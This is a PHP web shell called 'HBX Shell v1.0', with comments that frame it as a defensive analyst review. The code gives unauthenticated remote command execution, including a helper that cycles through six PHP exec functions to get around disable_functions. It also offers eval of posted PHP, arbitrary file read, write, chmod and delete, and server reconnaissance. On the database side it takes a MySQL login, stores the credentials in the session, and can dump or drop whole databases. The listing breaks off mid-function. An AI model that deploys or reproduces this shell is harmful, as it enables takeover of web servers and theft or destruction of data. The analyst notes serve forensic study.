<?php
// Analyst notes (defensive review). This file is a self-contained PHP web
// shell; the page <title> and the SQL-dump banner further down name it
// "HBX Shell v1.0". Every action is selected by the POST parameter `s`
// (or by GET `sqldl` / `dl`), and no authentication check is visible in
// this listing before any of those actions is dispatched.
ob_start();
session_start();
// Purely cosmetic: colours/fonts interpolated into the <style> block of the
// HTML template at the end of the file.
$shell=array("Background"=>"#000000","Primary_Color"=>"#FFFFFF","Border"=>"#3388ff","Font"=>"Arial","Hover"=>"#00FF00",
"Header_Color"=>"#3388ff","Header_Font"=>"verdana","Link_Color"=>"#3388ff","Input_BG"=>"#000000","Input_Color"=>"#3388ff","Input_Border"=>"#bbbbbb", "Textarea_BG"=>"#000000","Textarea_Color"=>"#FFFFFF","Textarea_Border"=>"#3388ff",
"CMD_BG"=>"#000000","CMD_COLOR"=>"#3388ff","CMD_BORDER"=>"#3377dd","CMD_FONT"=>"Arial");
// GET sqldl: stream a SQL dump as an attachment (mysql_prepare_dump_file) and stop.
// Handled before the POST dispatcher, so it needs nothing but an existing session.
if(isset($_GET['sqldl'])) {mysql_prepare_dump_file(); exit;}
// Action dispatcher. Each handler echoes an HTML fragment and the `exit`
// below stops the script, so these requests never render the full template —
// in access logs they appear as POSTs to this file carrying `s=<action>`.
if(isset($_POST['s'])) {
switch($_POST['s']) {
// --- file-manager actions (paths come straight from POST) ---
case 'rename':
rename_file($_POST['file'],$_POST['rname']);
break;
case 'chmod':
if(is_dir($_POST['file'])) chmod_dir($_POST['file'],$_POST['mod'],true);
else chmod_file($_POST['file'],$_POST['mod']);
break;
case 'mv':
if(is_dir($_POST['file'])) move_dir($_POST['file'],$_POST['location'],true);
else move_file($_POST['file'],$_POST['location']);
break;
case 'del':
if(is_dir($_POST['file'])) delete_dir($_POST['file'],true);
else delete_file($_POST['file']);
break;
// 'view' without `f` lists a directory; with `f` it opens a file for editing.
case 'view':
if(!isset($_POST['f'])) list_contents();
else view_file($_POST['f']);
break;
case 'fsave':
write_contents();
break;
// --- MySQL actions (credentials are kept in $_SESSION after `sql`) ---
case 'sql':
sql_login();
break;
case 'sqlview':
sql_viewer();
break;
case 'insert':
sql_insert();
break;
// Raw SQL text from POST `q`, executed as-is by execute_query().
case 'query':
execute_query(stripslashes($_POST['q']));
break;
case 'logout':
sql_end_session();
break;
case 'create':
sql_create();
break;
case 'drop':
sql_drop();
break;
case 'edit':
sql_edit();
break;
// --- code execution ---
// 'eval' runs PHP source from POST `e`; 'exec' runs an OS command from POST `cmd`.
case 'eval':
post_eval();
break;
case 'cmd':
console();
break;
case 'exec':
echo execute_cmd($_POST['cmd']);
break;
// 'kill' deletes this script from disk (two-step, see kill_shell()).
case 'kill':
kill_shell();
break;
default:
list_contents();
break;
}
exit;
}
// GET dl=<path>: read the named path line by line and return it as an
// attachment. stripslashes() is applied to every line, so the downloaded copy
// is not byte-identical to the source file when it contains backslashes.
if(isset($_GET['dl']))
{
$fh=fopen($_GET['dl'],'r');
while(!feof($fh)) $file.=stripslashes(fgets($fh));
fclose($fh);
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($file));
header("Content-disposition: attachment; filename=".basename($_GET['dl']).";");
echo $file;
exit;
}
// Host fingerprint shown in the page header (the rendering is in the HTML
// template, outside this view). Note the inverted naming: "$local_*" holds the
// *visitor's* address (REMOTE_ADDR), "$remote_*" the served host name.
$location=getcwd().'\\'.basename($_SERVER['PHP_SELF']); // backslash separator
$local_addr=$_SERVER['REMOTE_ADDR'];
$local_host=gethostbyaddr($local_addr);
$remote_host=$_SERVER['HTTP_HOST'];
$remote_addr=gethostbyname($remote_host);
// Each probe yields a colour-coded HTML snippet, not a plain value.
$open_basedir=(ini_get("open_basedir")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
$safe_mode=(ini_get("safe_mode")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
$mysql_on=(function_exists("mysql_connect")&&is_callable("mysql_connect"))?"<font color='#00FF00'><b>On</b></font>":"<font color='#FF0000'>Off</font>";
$disabled_functions=(ini_get("disable_functions"))?ini_get("disable_functions"):"<font color='#00FF00'><b>None</b></font>";
$software=$_SERVER['SERVER_SOFTWARE'];
$php_ver=phpversion();
$uname=php_uname();
$curl_on=(function_exists("curl_init")&&is_callable("curl_init"))?"<font color='#00FF00'><b>Enabled</b></font>":"<font color='#FF0000'>Off</font>";
$read_passwd=(file_exists("/etc/passwd")&&is_readable("/etc/passwd"))?"<font color='#00FF00'><b>Yes</b></font>":"<font color='#FF0000'>No</font>";
$disk_free=size(disk_free_space(getcwd()));
$disk_space=size(disk_total_space(getcwd()));
$includes=(@ini_get('allow_url_include')=='')?"<font color='#FF0000'>Disabled</font>":"<font color='#00FF00'><b>Enabled</b></font>";
// Runs an OS command string and returns its output.
// Walks the list shell_exec, exec, passthru, system, popen, proc_open and uses
// the FIRST one whose name is absent from ini `disable_functions`; the
// `return` sits inside that branch, so later candidates are never tried.
// Hardening note: the check is purely by name, so all six must appear in
// disable_functions for this helper to yield nothing.
function execute_cmd($cmd) {
@$_dfunctions=ini_get("disable_functions");
$_dfunctions=str_replace(' ','',$_dfunctions);
$farr=explode(',',$_dfunctions);
$_functions=array("shell_exec","exec","passthru","system","popen","proc_open");
foreach($_functions as $_function)
{
if(!in_array($_function,$farr))
{
if($_function=="exec")
{
@$buf=exec($cmd,$arr);
$ret=join("\n",$buf);
}
elseif($_function=="system")
{
@$ret=system($cmd);
}
elseif($_function=="passthru")
{
@$ret=passthru($cmd);
}
elseif($_function=="shell_exec")
{
@$ret=shell_exec($cmd);
}
elseif($_function=="popen")
{
@$p=popen($cmd,'r');
if(is_resource($p))
{
while(!feof($p)) $ret.=fgets($p);
@pclose($p);
}
}
elseif($_function=="proc_open")
{
$cmdpipe=array(
0=>array('pipe','r'),
1=>array('pipe','w')
);
@$proc=proc_open($cmd,$cmdpipe,$pipes);
if(@is_resource($proc))
{
while(@!feof($pipes[1]))
$ret.=@fgets($pipes[1]);
@fclose($pipes[1]);
@proc_close($resource);
}
}
return $ret;
}
}
}
  156. //Begin file functions
  157. //Primary
// File-manager view: lists POST `d` (default: cwd) as an HTML table.
// Directories and files are collected separately with owner/group, octal
// perms and mtime; every row links back into the `view`, `chmod`, `move`,
// `rename`, `del` and `dl` actions. Only `.` is skipped, so `..` stays in the
// listing and the view can walk upward from the starting directory.
function list_contents() {
$dirs_array=array(
"Name"=>array(),
"Link"=>array(),
"Size"=>array(),
"Group"=>array(),
"Owner"=>array(),
"Perms"=>array(),
"Modified"=>array()
);

$files_array=$dirs_array;
$dir=(isset($_POST['d']))?clean_dir($_POST['d']):clean_dir(getcwd());
if(!@$dh=opendir($dir)) die("Permission denief in $dir!");

while((@$file=readdir($dh))) {
if($file=='.') continue;
$full_path=$dir.'/'.$file;
if(is_dir($full_path)) {
$dirs_array['Name'][]=$file;
$dirs_array['Link'][]=$full_path;
$dirs_array['Size'][]="DIR";
// Resolve numeric uid/gid to names when the posix extension is present.
$owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
$grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
if(is_array($owner)) $owner=$owner['Name'];
if(is_array($grp)) $grp=$grp['Name'];
$dirs_array['Owner'][]=$owner;
$dirs_array['Group'][]=$grp;
$dirs_array['Perms'][]=get_perms(fileperms($full_path),'d');
$dirs_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
}
else {
$files_array['Name'][]=$file;
$files_array['Link'][]=$full_path;
$files_array['Size'][]=size(filesize($full_path));
$owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
$grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
if(is_array($owner)) $owner=$owner['name'];
if(is_array($grp)) $grp=$grp['name'];
$files_array['Owner'][]=$owner;
$files_array['Group'][]=$grp;
$files_array['Perms'][]=get_perms(fileperms($full_path),'f');
$files_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
}
}
@closedir($dh);
asort($dirs_array);
asort($files_array);

// Legend plus a clickable breadcrumb built from the path components.
echo "
<div class='info'>
<table><tr><td><font color='#FF00FF'>[ Executable ]</font></td><td><font color='#0000FF'>[ Writable ]</font></td>
<td><font color='#FF0000'>[ Config ]</font></td><td><font color='#00FF00'>[ DIR ]</font></td></tr></table><center>Viewing directory: ";
$arr=explode('/',$dir);
foreach($arr as $piece) {
$path.="$piece/";
echo "<a href='#' onClick=\"sendRequest('view&d=$path')\">$piece/</a>";
}
echo "</center></div><br />
<table style='width: 100%'>
<tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Modified</td><td>Actions</td></tr>";

// Directory rows; `..` is rewritten through dir_lower() to the parent path.
for($d=0;$d<count($dirs_array['Name']);$d++) {
$nm=$dirs_array['Name'][$d];
if($nm=="..") $link=dir_lower(clean_dir($dirs_array['Link'][$d]));
else $link=$dirs_array['Link'][$d];
echo "<tr><td><a href='#' onClick=\"sendRequest('view&d=$link')\"><font color='#00FF00'>[$nm]</font></a></td><td>".$dirs_array['Size'][$d]."</td><td>"
.$dirs_array['Owner'][$d].'/'.$dirs_array['Group'][$d]."</td><td>".$dirs_array['Perms'][$d]."</td><td>"
.$dirs_array['Modified'][$d]."</td><td><a href='#' onClick=\"loadInput('chmod','".$dirs_array['Link'][$d]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('move','".$dirs_array['Link'][$d]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$dirs_array['Link'][$d]."')\">[ Delete ]</a></td><td><input type='checkbox'></td></tr>";
}
// File rows, colour-coded: executable, path containing "config" (eregi(),
// a PHP 5 function removed in 7.0), .sql/.db extension, writable, other.
for($i=0;$i<count($files_array['Name']);$i++) {
if(is_executable($files_array['Link'][$i])) $color='#FF00FF';
else if(eregi("config",$files_array['Link'][$i])) $color='#FF0000';
else if(strrchr($files_array['Name'][$i],'.')=="sql" || strrchr($files_array['Name'][$i],'.')=="db") $color='#00FF00';
else if(is_writable($files_array['Link'][$i])) $color='#0000FF';
else $color="#FFFFFF";
$nm=$files_array['Name'][$i];
echo "<tr style='color: $color;'><td>
<a href='#' onClick=\"sendRequest('view&f=".$files_array['Link'][$i]."')\"><font color='$color'>$nm</a></font></td><td>"
.$files_array['Size'][$i]."</td><td>".$files_array['Owner'][$i].'/'.$files_array['Group'][$i]."</td><td>".$files_array['Perms'][$i]."</td><td>"
.$files_array['Modified'][$i]."</td><td><a href='#' onClick=\"loadInput('chmod','".$files_array['Link'][$i]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('rename','".$files_array['Link'][$i]."')\">[ Rename ]</a> <a href='#' onClick=\"loadInput('move','".$files_array['Link'][$i]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$files_array['Link'][$i]."')\"> [ Delete ] </a><a href='?dl=".$files_array['Link'][$i]."' target='_blank'>[ Download ]</a></td><td><input type='checkbox'></td></tr>";
}
echo "</table>";
}
  242.  
// File editor: reads $file, HTML-escapes it into a <textarea> and offers a
// [ Save ] link that posts back through the `fsave` action. On open failure
// it prints a message and falls back to the directory listing.
function view_file($file) {
$fh=fopen($file,'r');
if(is_resource($fh)) {
while(!feof($fh)) $fcontents.=htmlspecialchars(fgets($fh));
fclose($fh);
echo "<center><a href='#' onClick=\"sendRequest('fsave&f=$file','save')\">[ Save ]</a></center>
<textarea id='file' rows='20' style='width: 100%'>$fcontents</textarea>";
} else {echo "Failed to open file $file for reading!<br /><br />"; list_contents();}
}
  252.  
// Creates (or truncates, since mode 'w') an empty file at $file; errors are suppressed.
function create_file($file) {
@$fh=fopen($file,'w');
@fclose($fh);
}
  257.  
// `fsave` handler: overwrites the path in POST `f` with POST `data`
// (stripslashes() applied), reports the result and re-renders the listing.
function write_contents() {
if(is_resource($fh=fopen($_POST['f'],'w'))) {
fwrite($fh,stripslashes($_POST['data']),strlen($_POST['data']));
fclose($fh);
echo "File $_POST[f] saved successfully!<br /><br />";
} else {echo "Failed to write to file $_POST[f]!<br /><br />";}
list_contents();
}
  266. //Secondary
  267.  
// Renders a fileperms() value as an octal string: the mode is converted to
// base 8 and the leading type digits are cut (2 for directories, 3 otherwise).
function get_perms($mode,$type) { #Update for *nix perms later.
if($type=='d') $mode=substr(base_convert($mode,10,8),2);
else $mode=substr(base_convert($mode,10,8),3);
return $mode;
}
  273.  
// chmod() a single file with the mode value exactly as received, then relist.
function chmod_file($file,$perms) {
if(chmod($file,$perms)) echo "Managed to chmod file $file successfully.<br /><br />";
else echo "Failed to chmod file $file.<br /><br />";
list_contents();
}
  279.  
// Renames $old to $new within the same directory: the directory prefix of
// $old is rebuilt component by component and $new is appended to it.
function rename_file($old,$new) {
$arr=explode('/',$old);
array_pop($arr);
foreach($arr as $piece) $rname.="$piece/";
$rname.=$new;
if(rename($old,$rname)) echo "Managed to rename file $file successfully.<br /><br />";
else echo "Failed to rename file $file.<br /><br />";
list_contents();
}
  289.  
// "Move" is implemented as a read-then-write copy of $old into $new; no
// unlink() of the source is performed here, so the original remains on disk.
function move_file($old,$new) {
$fh=fopen($old,'r');
$fh2=fopen($new,'w');
if(is_resource($fh2)&&is_resource($fh)) {
while(!feof($fh)) $out_contents.=fgets($fh);
fwrite($fh2,$out_contents,strlen($out_contents));
fclose($fh);
fclose($fh2);
echo "Moved file $old to $new successfully.<br /><br />";
} else {echo "Failed to move file $old to $new<br /><br />";}
list_contents();
}
  302.  
// unlink() a single path, report, and relist.
function delete_file($file) {
if(unlink($file)) echo "Managed to delete file $file successfully.<br /><br />";
else echo "Failed to delete file $file.<br /><br />";
list_contents();
}
  308.  
  309. //Repetitive file functions
// Recursive chmod of the files below $dir (subdirectories are descended into
// but not themselves chmod'ed). $call marks the top-level invocation, which
// prints the summary and re-renders the listing. The counters are reset on
// entry, so the reported totals cover only the current directory level.
function chmod_dir($dir,$perms,$call=false,$success=0,$files=0) {
$files=$success=0;
if(is_resource($dh=opendir($dir))) {
while(($file=readdir($dh))) {
if($file==".."||$file==".") continue;
$files++;
if(is_dir($dir.'/'.$file)) {
chmod_dir($dir.'/'.$file,$perms,false,$success,$files);
continue;
}
if(chmod($dir.'/'.$file,$perms)) {$success++; echo "CHMOD $file to $perms<br />";}
}
closedir($dh);
if($call) echo "Changed perms for $success files out of $files files.<br /><br />";
} else {echo "Failed to open dir $dir<br /><br />";}
if($call) list_contents();
}
  327.  
// Recursive copy of $dir into $loc. The copy only happens when $loc does not
// exist yet (the whole loop sits inside `if(!is_dir($loc))`); an existing
// destination is left untouched. As with move_file(), nothing is deleted
// from the source tree.
function move_dir($dir,$loc,$call=false) {
if(is_resource($dh=opendir($dir))) {
if(!is_dir($loc)) {
if(!mkdir($loc)) die("Failed to create new location!");
if(is_resource($dh2=opendir($loc))) {
while(($file=readdir($dh))) {
if($file=='.'||$file=='..') continue;
if(is_dir($dir.'/'.$file)) {
move_dir($dir.'/'.$file.'/',$loc.'/'.$file);
continue;
}
create_file($loc.'/'.$file);
$cur=fopen($dir.'/'.$file,'r');
while(!feof($cur)) $contents.=fgets($cur);
fclose($cur);
$cur=fopen($loc.'/'.$file,'w');
fwrite($cur,$contents,strlen($contents));
fclose($cur);
}
} else {echo "Failed to [M] open dir $loc!";}
} else {echo "Failed to open dir $dir!<br /><br />";}
}
if($call) list_contents();
}
  352.  
// Recursively unlink()s every file below $dir. No rmdir() is called, so the
// (now empty) directory skeleton survives — a useful post-incident artifact.
// $call marks the top-level invocation that prints the summary and relists.
function delete_dir($dir,$call=false,$success=0,$files=0) {
if(is_resource($dh=opendir($dir))) {
$files=$success=0;
while(($file=readdir($dh))) {
if($file==".."||$file==".") continue;
$files++;
if(is_dir($dir.'/'.$file)) {
delete_dir($dir.'/'.$file,false,$success,$files);
continue;
}
if(unlink($dir.'/'.$file)) {$success++; echo "Deleted $file...<br />";}
}
closedir($dh);
if($call) echo "Deleted $success files out of $files files.<br /><br />";
} else {echo "Failed to open dir $dir.<br /><br />";}
if($call) list_contents();
}
  370. //End
  371.  
// Path normalisation: backslashes become forward slashes, "//" collapses to "/".
function clean_dir($d) {
$d=str_replace("\\","/",$d);
$d=str_replace("//","/",$d);
return $d;
}
  377.  
// Parent-directory helper for the `..` entry: drops the last two path
// components (the `..` itself and the directory it sits in) and rejoins
// the rest with a trailing slash.
function dir_lower($d) {
$dir=explode("/",$d);
array_pop($dir);
array_pop($dir);
foreach($dir as $chunks) $lower.="$chunks/";
return $lower;
}
  385.  
// Human-readable byte count ("0 B", "12 KB", ...); falsy input yields "0 B".
function size($s) {
if(!$s) return "0 B";
if($s>=1073741824) return(round($s/1073741824)." GB");
elseif($s>=1048576) return(round($s/1048576)." MB");
elseif($s>=1024) return(round($s/1024)." KB");
else return($s.=" B");
}
  393. //End file functions
  394. //Begin SQL functions
// MySQL login flow (legacy mysql_* extension, removed in PHP 7.0).
// Already logged in -> database list; no POST host -> login form; otherwise
// mysql_connect() with the posted host/user/pass and, on success, the three
// credentials are stored in plaintext in $_SESSION. Forensics: the PHP session
// store for this site therefore holds the database credentials the operator used.
function sql_login() {
if(isset($_SESSION['user'])) {mysql_view_dbs();}
else if(!isset($_POST['host'])) {
echo "<center>
Host:Port: <input type='text' id='sql_host' value='localhost:3306'><br />
Username: <input type='text' id='sql_user' value='root'><br />
Password: <input type='password' id='sql_pass'><br /><br />
<a href='#' onClick=\"sendRequest('sql','sqllogin')\">[ Login ]</a>
</center>";
} else {
echo "<center>";
if(@$conn=mysql_connect($_POST['host'],$_POST['user'],$_POST['pass'])) {
echo "<font color='#00FF00'><b>Access granted</b></font></center>";
$_SESSION['host']=$_POST['host'];
$_SESSION['user']=$_POST['user'];
$_SESSION['pass']=$_POST['pass'];
mysql_view_dbs();
} else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
}
}
  415.  
// Database overview. extract($_SESSION) turns the stored host/user/pass into
// locals; every database is listed with its table count and links for
// `sqlview`, `sqldl` (dump download) and `drop`, followed by a create-database
// input and a free-form query box (the `query` action).
function mysql_view_dbs() {
extract($_SESSION);
echo "<center><br /><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table>";
if(@$conn=mysql_connect($host,$user,$pass)) {
echo "<tr><td>Database</td><td>Tables</td></tr>";
$dbs=mysql_list_dbs();
while($db=mysql_fetch_array($dbs))
{
$cur=mysql_query("SHOW TABLES FROM $db[Database]");
$count=mysql_num_rows($cur);
echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$db[Database]')\">$db[Database]</a></td><td>$count</td><td><a href='?sqldl=1&db=$db[Database]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$db[Database]')\">[ Drop ]</a></td></tr>";
}
} else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Create Database ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' value='New_Database' onKeyDown=\"checkKey(event,'create')\"></div><br /><br />Execute query<br /><br /><input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
}
  431.  
// Table/row browser. Without POST `tbl` it lists the tables of POST `db`
// (with column counts, dump and drop links); with `tbl` it dumps every row of
// that table into an HTML table with per-row `edit` / `drop` links. Database
// and table names are interpolated into the SQL text unquoted.
function sql_viewer() {
extract($_SESSION);
echo "<center><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table style='text-align: center;'>";
if(@$conn=mysql_connect($host,$user,$pass)) {
if(!isset($_POST['tbl'])) {
echo "<tr><td>Table</td><td>Columns</td></tr>";
$query=mysql_query("SHOW TABLES FROM $_POST[db]");
while($tbl=mysql_fetch_array($query)) {
$cols=mysql_query("SHOW COLUMNS FROM $_POST[db].$tbl[0]");
$count=mysql_num_rows($cols);
echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$_POST[db]&tbl=$tbl[0]')\">$tbl[0]</a></td><td>$count</td><td><a href='?sqldl=1&db=$_POST[db]&tbl=$tbl[0]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$tbl[0]')\">[ Drop ]</a></td></tr>";
}
echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Insert table ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' style='width: 20%' value='new_table' onKeyDown=\"checkKey(event,'createtbl')\"><input type='hidden' id='sql_db' value='$_POST[db]'></div><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
} elseif(isset($_POST['tbl'])) {
$columns=array();
$query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
echo "<tr>";
for($t=0;$t<count($columns);$t++) echo "<td>$columns[$t]</td>";
echo "<td>Row actions</td></tr>";
// Full table read: every row is fetched and rendered, with no LIMIT.
$query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl]");
while($row=mysql_fetch_array($query)) {
echo "<tr>";
for($i=0;$i<count($columns);$i++)
echo "<td>$row[$i]</td>";
echo "<td><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v='+encodeURIComponent('$row[0]')+'')\">[ Edit Row ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v=$row[0]')\">[ Remove row ]</a></td>";
echo "</tr>";
}
echo "</table><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]')\">[ Insert row ]</a><br /><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
}
}
}
  464.  
// GET `sqldl` handler: builds a text export of one table (GET `tbl`) or of
// every table in GET `db` and sends it as an attachment named
// "<db>_<tbl>.sql" or "<db>.sql". The file opens with a fixed banner line
// ("SQL Data dumped by HBX Shell (version 1.0)") and closes with
// "END OF SQL DUMP" — both are distinctive markers for spotting exported
// data at rest or in transit. Row values are written between backticks.
// ob_get_clean() discards the progress messages echoed earlier so that the
// attachment starts with the banner.
function mysql_prepare_dump_file()
{
echo "<h2>Preparing to dump SQL data...<br />";
extract($_SESSION);
if(@$conn=mysql_connect($host,$user,$pass)) {
echo "Logged on to SQL server...good.<br />";
$dump_file="#######################SQL Data dumped by HBX Shell (version 1.0)#######################\r\n";
$dump_name=isset($_GET['tbl'])?$_GET['db'].'_'.$_GET['tbl'].'.sql':$_GET['db'].'.sql';
if(isset($_GET['tbl'])) {
// Single-table export.
echo "Dumping data from table $_GET[tbl]...<br />";
mysql_select_db($_GET['db']);
$columns=array();
$query=mysql_query("SHOW COLUMNS FROM $_GET[tbl]");
while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
$query=mysql_query("SELECT * FROM $_GET[tbl]");
while($row=mysql_fetch_array($query)) {
$dump_file.="INSERT INTO `$_GET[tbl]` (";
for($i=0;$i<count($columns);$i++) {
if($i==count($columns)-1)
$dump_file.="`$columns[$i]`)\r\n";
else
$dump_file.="`$columns[$i]`,";
}
$dump_file.="VALUES ( ";
for($j=0;$j<count($row);$j++) {
if($j==count($row)-1)
$dump_file.="`$row[$j]`)\r\n";
else
$dump_file.="`$row[$j]`,";
}
}
}
else {
// Whole-database export: one SHOW COLUMNS + SELECT * per table.
echo "Dumping data from database $_GET[db]...<br />";
$tables=array();
$columns=array();
$query=mysql_query("SHOW TABLES FROM $_GET[db]");
while($tbl=mysql_fetch_array($query)) $tables[]=$tbl[0];
foreach($tables as $current_table) {
$current_cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$current_table");
while($col=mysql_fetch_array($current_cols)) $columns[]=$col['Field'];
$query=mysql_query("SELECT * FROM $_GET[db].$current_table");
while($row=mysql_fetch_array($query)) {
$dump_file.="INSERT INTO `$current_table` (";
for($i=0;$i<count($columns);$i++) {
if($i==count($columns)-1)
$dump_file.="`$columns[$i]`) \r\n";
else
$dump_file.="`$columns[$i]`,";
}
$dump_file.="VALUES ( ";
for($j=0;$j<count($row);$j++) {
if($j==count($row)-1)
$dump_file.="`$row[$j]`)\r\n";
else
$dump_file.="`$row[$j]`,";
}
}
$columns=array(); #Reset this badboy
}
}
$dump_file.="END OF SQL DUMP\r\n";
$dump_file.="########################################################################################";
ob_get_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($dump_file));
header("Content-disposition: attachment; filename=$dump_name;");
echo $dump_file;
exit;
}
else echo "Failed to login! Cannot dump SQL.";
echo "</h2>";
}
  538.  
// `drop` action, three granularities selected by which POST keys exist:
// only `db`  -> DROP DATABASE;
// `db`+`tbl` -> DELETE FROM (empties the table; it is not dropped);
// + `row`/`v` -> DELETE of the rows where `<row>`='<v>'.
// Any MySQL error ends the request via die(mysql_error()).
function sql_drop() {
extract($_SESSION);
if(@$conn=mysql_connect($host,$user,$pass)) {
if(!isset($_POST['tbl'])) {
mysql_query("DROP DATABASE $_POST[db]") or die(mysql_error());
echo "<center><font color='#00FF00'>Dropped database $_POST[db] successfully.</font><br /></center>";
mysql_view_dbs();
} elseif(isset($_POST['tbl'])&&!isset($_POST['row'])) {
mysql_query("DELETE FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
echo "<center><font color='#00FF00'>Dropped table $_POST[tbl] successfully.</font><br /></center>";
mysql_view_dbs();
} else {
mysql_query("DELETE FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
echo "<center><font color='#00FF00'>Deleted row successfully.</font><br /></center>";
mysql_view_dbs();
}
}
}
// `create` action: CREATE DATABASE (POST `db` only) or CREATE TABLE
// `db`.`tbl` with a single placeholder column named TEMPORARY.
function sql_create() {
extract($_SESSION);
if(@$conn=mysql_connect($host,$user,$pass)) {
if(!isset($_POST['tbl'])) {
mysql_query("CREATE DATABASE $_POST[db]") or die(mysql_error());
echo "<center><font color='#00FF00'>Created database $_POST[db] successfully.</font><br /></center>";
mysql_view_dbs();
} else {
mysql_query("CREATE TABLE $_POST[db].$_POST[tbl] (`TEMPORARY` TEXT NOT NULL)") or die(mysql_error());
echo "<center><font color='#00FF00'>Created table $_POST[db].$_POST[tbl] successfully.</font><br /></center>";
mysql_view_dbs();
}
}
}
// `insert` action. First call (no POST `update`): renders one text input per
// column of `db`.`tbl`. Second call: every POST key whose name matches a
// column becomes a column/value pair of a single INSERT; values are wrapped
// in single quotes and otherwise inserted as received.
function sql_insert() {
echo "<center><form id='vals'>";
extract($_SESSION);
if(@$conn=mysql_connect($host,$user,$pass)) {
$cols=array();
$query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
if(!isset($_POST['update'])) {
for($i=0;$i<count($cols);$i++) {
echo "<input type='hidden' value='$cols[$i]'>
$cols[$i]: <input type='text'><br />";
}
echo "</form><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]','insert')\">[ Insert ]</a>";
} else {
$fields=array();
$rows=array();
foreach($_POST as $key=>$value) {
if(in_array($key,$cols)) {
$fields[]="'".$value."'";
$rows[]="`".$key."`";
}
}
$vals=implode(",",$fields);
$keys=implode(",",$rows);
mysql_query("INSERT INTO $_POST[db].$_POST[tbl] ($keys) VALUES ($vals)") or die(mysql_error());
echo "Inserted row successfully.";
}
}
echo "</center>";
mysql_view_dbs();
}
// `edit` action. With POST `update` != 1: SELECT the row where `<row>`='<v>'
// and render an input per column. With `update` == 1: assemble an UPDATE
// from the POST keys that match column names, echo the statement text to the
// page (so the exact SQL run appears in the response), then execute it.
function sql_edit() {
$cols=array();
echo "<center>";
extract($_SESSION);
if(@$conn=mysql_connect($host,$user,$pass)) {
if($_POST['update']!=1) {
$query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
$query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
if(mysql_num_rows($query)>0) {
echo "<form id='sqlvals'>";
while($row=mysql_fetch_array($query)) {
for($i=0;$i<count($cols);$i++)
echo "<input type='hidden' value='$cols[$i]'>$cols[$i]: <input type='text' value='$row[$i]'><br />";
}
echo "</form><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row='+encodeURIComponent('$_POST[row]')+'&v='+encodeURIComponent('$_POST[v]')+'','sqlsave')\">[ Save ]</a>";
} else {echo "MySQL returned 0 results.";}
} else {
$vals=array();
$keys=array();
$query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
$update="UPDATE $_POST[db].$_POST[tbl]";
foreach($_POST as $k=>$v) {
if(in_array($k,$cols)) {
$vals[]=$v;
$keys[]=$k;
}
}
